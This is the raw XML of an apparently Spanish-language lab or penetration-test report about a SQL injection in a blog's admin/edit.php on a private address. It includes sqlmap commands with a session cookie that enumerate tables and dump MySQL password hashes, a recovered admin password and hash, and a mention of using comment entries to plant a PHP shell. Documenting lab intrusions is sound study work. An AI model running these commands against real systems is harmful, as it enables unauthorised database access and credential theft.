    <w:p w14:paraId="2480E181" w14:textId="045C71A4" w:rsidR="000C3DEF" w:rsidRPr="00AB4F3D" w:rsidRDefault="000C3DEF" w:rsidP="0095733E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B07A77D" w14:textId="77777777" w:rsidR="009725A0" w:rsidRPr="00AB4F3D" w:rsidRDefault="009725A0" w:rsidP="0095733E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA36C5A" w14:textId="30EEF090" w:rsidR="001A7B60" w:rsidRDefault="001A7B60" w:rsidP="00957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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4524712E" w14:textId="5C20B3ED" w:rsidR="00093258" w:rsidRDefault="00093258" w:rsidP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C6E127" wp14:editId="4CAE7739">
            <wp:extent cx="4404316" cy="8527312"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="404257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77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863" cy="85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FA0E" w14:textId="73220A7E" w:rsidR="001A7B60" w:rsidRPr="00AB4F3D" w:rsidRDefault="001A7B60" w:rsidP="009573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d)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79389396" w14:textId="307FF39A" w:rsidR="00093258" w:rsidRPr="00AB4F3D" w:rsidRDefault="00093258" w:rsidP="0095733E">
      <w:p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softHyphen/>
      </w:r>
      <w:r w:rsidRPr="00AB4F3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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1B7A3F" wp14:editId="738A8A8B">
            <wp:extent cx="4975860" cy="8591107"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="43543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4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342" cy="85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0915" w14:textId="32538694" w:rsidR="001A7B60" w:rsidRDefault="001A7B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RESUMEN: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27825F95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Inyección SQL Identificada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F998D4D" w14:textId="1A922EC1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Parámetro Vulnerable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4F3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> id en la URL http://10.0.2.21/admin/edit.php?id=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4F3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CEA953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Tipos de Inyección:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2342B3A4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Boolean-based blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F24FED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Time-based blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF11D85" w14:textId="77777777" w:rsidR="001A7B60" w:rsidRPr="00AB4F3D" w:rsidRDefault="001A7B60" w:rsidP="001A7B60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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UNION query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F068323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Base de Datos Identificada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E18719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Nombre de la Base de Datos:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4F3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> blog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72087217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Tablas Identificadas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490DDC68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comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CD6BF5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posts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB3583D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users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4D0BE0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Contenido de la Tabla users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCD89E9" w14:textId="77777777" w:rsidR="001A7B60" w:rsidRPr="00AB4F3D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>Usuario admin con la contraseña P4ssw0rd (MD5 hash: 8efe310f9ab3efeae8d410a8e0166eb2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B307B19" w14:textId="77777777" w:rsidR="001A7B60" w:rsidRPr="00AB4F3D" w:rsidRDefault="001A7B60" w:rsidP="001A7B6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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Posibles Scripts para RCE en la Tabla comments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEF448C" w14:textId="51C84154" w:rsidR="001A7B60" w:rsidRDefault="001A7B60" w:rsidP="001A7B60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AB4F3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Varias entradas en la tabla comments </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pueden contener </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4F3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>scripts que pueden usarse para cargar una shell PHP en el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555A1522" w14:textId="7F2F3F64" w:rsidR="001A7B60" w:rsidRDefault="001A7B60" w:rsidP="001A7B60">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A7B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7.- Información extraída de zas Owasp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5C62FE27" w14:textId="5CBCFC6D" w:rsidR="001A7B60" w:rsidRDefault="001A7B60" w:rsidP="001A7B60">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F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2CCEC4" wp14:editId="34881EBE">
            <wp:extent cx="4762300" cy="3040912"/>
            <wp:effectExtent l="0" t="0" r="635" b="7620"/>
            <wp:docPr id="34179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4787" cy="3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DDF" w14:textId="0960E73B" w:rsidR="00D17BCE" w:rsidRPr="00D17BCE" w:rsidRDefault="00D17BCE" w:rsidP="00D17BCE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D17BCE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sqlmap -u "http://10.0.2.21/admin/edit.php?id=1" --sql-query="SELECT table_name FROM information_schema.tables WHERE table_schema = 'blog';"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D66AB3" w14:textId="6017568D" w:rsidR="00D17BCE" w:rsidRDefault="00D17BCE" w:rsidP="001A7B60">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D17BCE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A603B28" wp14:editId="7FFCB6DF">
            <wp:extent cx="5400040" cy="5821680"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1349478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8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850" w14:textId="093F477E" w:rsidR="00D17BCE" w:rsidRPr="004751E1" w:rsidRDefault="004751E1" w:rsidP="001A7B6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8.- </w:t>
      </w:r>
      <w:r w:rsidR="002B0CE6" w:rsidRPr="004751E1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Se inicia e intentarte conectarse al objetivo, pero es redirigido (HTTP 302) a la pagina </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="002B0CE6" w:rsidRPr="004751E1">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://10.0.2.21/admin/login.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002B0CE6" w:rsidRPr="004751E1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Identificándose tres tipos de inyección en el parámetro id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011B760C" w14:textId="77777777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r w:rsidRPr="002B0CE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>  Blind Boolean-Based: Determina la inyección basándose en respuestas verdaderas o falsas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158C5DD7" w14:textId="77777777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r w:rsidRPr="002B0CE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>  Time-Based Blind: Usa retrasos temporales para deducir si la inyección es exitosa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC219FA" w14:textId="44F8AC6A" w:rsidR="002B0CE6" w:rsidRPr="002B0CE6" w:rsidRDefault="002B0CE6" w:rsidP="002B0CE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B0CE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>  Union-Based: Usa la cláusula UNION para combinar resultados de múltiples consultas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EE2C17" w14:textId="4C6F876D" w:rsidR="00D17BCE" w:rsidRPr="001F7B10" w:rsidRDefault="001F7B10" w:rsidP="0003474C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F7B10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Por todo lo anterior se procede a </w:t>
      </w:r>
      <w:r w:rsidR="0003474C" w:rsidRPr="001F7B10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>realizar</w:t>
      </w:r>
      <w:r w:rsidRPr="001F7B10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> la consulta </w:t>
      </w:r>
      <w:r w:rsidR="0003474C" w:rsidRPr="001F7B10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>más</w:t>
      </w:r>
      <w:r w:rsidRPr="001F7B10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> exhaustiva, </w:t>
      </w:r>
      <w:r w:rsidR="0003474C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="001F7B10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntentando no castar los resultados</w:t>
      </w:r>
      <w:r w:rsidR="0015553D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, no aportando nada nuevo.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F7B10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41393A3A" w14:textId="2303C4B9" w:rsidR="001F7B10" w:rsidRPr="001F7B10" w:rsidRDefault="001F7B10" w:rsidP="001A7B6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F7B10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>└─$ sqlmap -u "http://10.0.2.21/admin/edit.php?id=1" --cookie="PHPSESSID=c0kop54hhjbt1dstsr2pfpab07" --sql-query="SELECT table_name FROM information_schema.tables WHERE table_schema = 'blog';" --threads=5 --no-cast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7AD236" w14:textId="620CDD23" w:rsidR="001F7B10" w:rsidRPr="001F7B10" w:rsidRDefault="001F7B10" w:rsidP="001A7B60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F7B10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228C7018" wp14:editId="118DAB8C">
            <wp:extent cx="5372059" cy="6787098"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="20032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5777" cy="68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BB23" w14:textId="0F72C674" w:rsidR="00D17BCE" w:rsidRDefault="004751E1" w:rsidP="001A7B6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9.- </w:t>
      </w:r>
      <w:r w:rsidRPr="004751E1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Aprovechando la vulnerabilidad de e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dit de sqli, se intenta conseguir la contraseña del servidor mysql</w:t>
      </w:r>
      <w:r w:rsidR="00971F91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0361B73D" w14:textId="77777777" w:rsidR="00971F91" w:rsidRDefault="00971F91" w:rsidP="001A7B60">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="048FEBDD" w14:textId="1545FAB3" w:rsidR="00971F91" w:rsidRDefault="00971F91" w:rsidP="001A7B60">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00971F91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://10.0.2.21/admin/edit.php?id=1" --cookie=PHPSESSID="c0kop54hhjbt1dstsr2pfpab07" --dbms=mysql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00971F91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C031843" w14:textId="15E3BDC3" w:rsidR="00971F91" w:rsidRPr="00971F91" w:rsidRDefault="00971F91" w:rsidP="001A7B60">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00971F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CF3A68C" wp14:editId="275062E1">
            <wp:extent cx="5400040" cy="5207679"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1175568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8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3190" cy="52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6BC" w14:textId="4BA9EE81" w:rsidR="00D17BCE" w:rsidRDefault="00971F91" w:rsidP="001A7B60">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00971F91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12F9CAF" wp14:editId="1EC42D2C">
            <wp:extent cx="5400040" cy="5765165"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="758566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6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C142" w14:textId="57CABA1D" w:rsidR="002C1979" w:rsidRPr="002C1979" w:rsidRDefault="002C1979" w:rsidP="001A7B60">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1979">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Se intenta hashear </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>el</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1979">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash de la contraseña con hashcat con resultado negativo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B539F22" w14:textId="1AE0C38D" w:rsidR="004E3BFC" w:rsidRDefault="004E3BFC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5FC4F4" w14:textId="6D90F704" w:rsidR="008755A9" w:rsidRPr="00AB4F3D" w:rsidRDefault="008755A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008755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613915" wp14:editId="251F6563">
            <wp:extent cx="5400040" cy="4197350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="145202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8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AF1" w14:textId="0C2F3A0D" w:rsidR="009F5DD6" w:rsidRPr="00AB4F3D" w:rsidRDefault="009F5DD6" w:rsidP="00996B60">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009F5DD6" w:rsidRPr="00AB4F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D46A1" w14:textId="77777777" w:rsidR="008C2113" w:rsidRDefault="008C2113" w:rsidP="001A7B60">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0360AA63" w14:textId="77777777" w:rsidR="008C2113" w:rsidRDefault="008C2113" w:rsidP="001A7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D8B09" w14:textId="77777777" w:rsidR="008C2113" w:rsidRDefault="008C2113" w:rsidP="001A7B60">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3D9FB4F9" w14:textId="77777777" w:rsidR="008C2113" w:rsidRDefault="008C2113" w:rsidP="001A7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B4E6D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D4E2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A4EF3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FABEE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822309">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="177802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6B"/>
    <w:rsid w:val="0003474C"/>
    <w:rsid w:val="00044DC9"/>
    <w:rsid w:val="00093258"/>
    <w:rsid w:val="000C3DEF"/>
    <w:rsid w:val="00103189"/>
    <w:rsid w:val="0014148F"/>
    <w:rsid w:val="0015553D"/>
    <w:rsid w:val="0016534F"/>
    <w:rsid w:val="00191C16"/>
    <w:rsid w:val="001A6E35"/>
    <w:rsid w:val="001A7B60"/>
    <w:rsid w:val="001C6B6B"/>
    <w:rsid w:val="001D5916"/>
    <w:rsid w:val="001F3633"/>
    <w:rsid w:val="001F7B10"/>
    <w:rsid w:val="00212F0A"/>
    <w:rsid w:val="002A7C68"/>
    <w:rsid w:val="002B0CE6"/>
    <w:rsid w:val="002B6BFB"/>
    <w:rsid w:val="002C1979"/>
    <w:rsid w:val="00385DCA"/>
    <w:rsid w:val="003A5007"/>
    <w:rsid w:val="003B0C8B"/>
    <w:rsid w:val="003C347E"/>
    <w:rsid w:val="003C4C36"/>
    <w:rsid w:val="003E3B8E"/>
    <w:rsid w:val="00412778"/>
    <w:rsid w:val="00421FAB"/>
    <w:rsid w:val="00422376"/>
    <w:rsid w:val="00427FC8"/>
    <w:rsid w:val="004751E1"/>
    <w:rsid w:val="004A1F56"/>
    <w:rsid w:val="004E3BFC"/>
    <w:rsid w:val="004F4306"/>
    <w:rsid w:val="00503686"/>
    <w:rsid w:val="00564608"/>
    <w:rsid w:val="00565F82"/>
    <w:rsid w:val="00650C0F"/>
    <w:rsid w:val="00665A22"/>
    <w:rsid w:val="006A09EA"/>
    <w:rsid w:val="006D04AA"/>
    <w:rsid w:val="00722CAD"/>
    <w:rsid w:val="0074399E"/>
    <w:rsid w:val="00835D1A"/>
    <w:rsid w:val="0085072B"/>
    <w:rsid w:val="008755A9"/>
    <w:rsid w:val="008C2113"/>
    <w:rsid w:val="008C7497"/>
    <w:rsid w:val="008E07EF"/>
    <w:rsid w:val="009234F5"/>
    <w:rsid w:val="009235B6"/>
    <w:rsid w:val="0093631D"/>
    <w:rsid w:val="0095733E"/>
    <w:rsid w:val="00971F91"/>
    <w:rsid w:val="009725A0"/>
    <w:rsid w:val="00996B60"/>
    <w:rsid w:val="00996D74"/>
    <w:rsid w:val="009D59A6"/>
    <w:rsid w:val="009F5DD6"/>
    <w:rsid w:val="00A55D60"/>
    <w:rsid w:val="00A831FE"/>
    <w:rsid w:val="00A90881"/>
    <w:rsid w:val="00AB4F3D"/>
    <w:rsid w:val="00B15E8A"/>
    <w:rsid w:val="00BF08BC"/>
    <w:rsid w:val="00C43BE3"/>
    <w:rsid w:val="00C44B5B"/>
    <w:rsid w:val="00C44E7B"/>
    <w:rsid w:val="00D14481"/>
    <w:rsid w:val="00D17BCE"/>
    <w:rsid w:val="00D37503"/>
    <w:rsid w:val="00D711C9"/>
    <w:rsid w:val="00D97AD5"/>
    <w:rsid w:val="00DD619C"/>
    <w:rsid w:val="00E07F19"/>
    <w:rsid w:val="00E2520A"/>
    <w:rsid w:val="00E46B6C"/>
    <w:rsid w:val="00E86623"/>
    <w:rsid w:val="00F12D17"/>
    <w:rsid w:val="00F77E62"/>
    <w:rsid w:val="00F91DEA"/>
    <w:rsid w:val="00FE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AB87D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C489597A-55D1-49ED-A5FE-C34C6704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E3B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E3BFC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E3BF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E3BF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1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1DE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oken">
    <w:name w:val="token"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00F91DEA"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00665A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5A2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A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B60"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001A7B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4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76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8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9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19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0.0.2.21/admin/login.ph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1</Pages>
  <Words>1131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57</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-22T04:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-11T02:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>